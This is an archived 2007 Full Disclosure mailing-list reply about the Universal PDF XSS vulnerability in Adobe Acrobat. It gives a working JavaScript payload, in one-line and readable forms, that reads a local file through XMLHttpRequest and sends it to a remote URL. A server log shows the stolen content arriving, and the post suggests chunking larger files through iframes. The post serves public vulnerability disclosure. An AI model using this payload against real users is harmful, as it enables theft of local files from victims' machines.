Full Disclosure mailing list archives

Re: Universal PDF XSS After Party

From: "T Biehn" <tbiehn () gmail com>
Date: Thu, 4 Jan 2007 11:06:24 -0500

Shows up in a log like this:
127.0.0.1 - - [04/Jan/2007:10:57:03 -0500] "GET
/whatever.htm?content=%3Chtml%3E%3Chead%3E%3Cmeta%20http-equiv=%22content-type%22%20content=%22text/html;charset=ISO-8859-1%22%3E%3Cmeta%20name=%22generator%22%20content=%22Adobe%20GoLive%205%22%3E%3Ctitle%3EAdobe%20Acrobat%20Standard%20and%20Professional%20Read%20Me%3C/title%3E%3C/head%3E%3Cbody%20bgcolor=%22
HTTP/1.1" 404 403 "" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:
1.8.1.1) Gecko/20061204 Firefox/2.0.0.1"

You could obviously a few iframes open on a site that would transfer each
chunk of the file, 64 bit encoded or what have you.

On 1/4/07, T Biehn <tbiehn () gmail com> wrote:


file:///C:/Program Files/Adobe/Acrobat 6.0/Resource/ENUtxt.pdf#something=javascript:function
cXHR(){try{return new ActiveXObject('Msxml2.XMLHTTP');}catch(e){}try{return
new ActiveXObject(' Microsoft.XMLHTTP');}catch(e){}try{return new
XMLHttpRequest();}catch(e){} return null;}var xhr =
cXHR();xhr.onreadystatechange = function(){if (xhr.readyState == 4){alert(
xhr.responseText);window.location = "http://localhost:80/whatever.htm?content=";
+ xhr.responseText;}};xhr.open('GET', 'file:///C:/ProgramFiles/Adobe/Acrobat
6.0/ReadMe.htm', true);xhr.send(null); <- sends a local file to a remote
location.

Readable:
function cXHR(){ //Grabs a legit XHR.
    try{
        return new ActiveXObject('Msxml2.XMLHTTP');
    }catch(e){}
    try{
        return new ActiveXObject('Microsoft.XMLHTTP ');
    }catch(e){}
    try{
        return new XMLHttpRequest();
    }catch(e){}
    return null;
}
var xhr = cXHR(); //For grabbing
xhr.onreadystatechange = function(){
    if (xhr.readyState == 4){
        alert(xhr.responseText);
        window.location = "http://localhost:80/whatever.htm?content="; +
xhr.responseText;
    }
};
xhr.open('GET', 'file:///C:/Program Files/Adobe/Acrobat 6.0/ReadMe.htm',
true);
xhr.send(null);

Works in FFOX / Opera, not in IE.

On 1/4/07, pdp (architect) <pdp.gnucitizen () googlemail com> wrote:
>
> Everybody knows about it. Everybody talks about it. We had a nice
> party. It is time for estimating the damages. In this article I will
> try to show the impact of the Universal PDF XSS vulnerability by
> explaining how it can be used in real life situations.
>
> http://www.gnucitizen.org/blog/universal-pdf-xss-after-party/
>
> --
> pdp (architect) | petko d. petkov
> http://www.gnucitizen.org
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Current thread:

Universal PDF XSS After Party pdp (architect) (Jan 04)
- Re: Universal PDF XSS After Party T Biehn (Jan 04)
  - Re: Universal PDF XSS After Party T Biehn (Jan 04)
- Re: Universal PDF XSS After Party(posible solution) Noe Espinoza M. (Jan 04)
  - Re: Universal PDF XSS After Party(posible solution) Darren Bounds (Jan 04)
  - Re: [WEB SECURITY] RE: Universal PDF XSS After Party(posible solution) RSnake (Jan 04)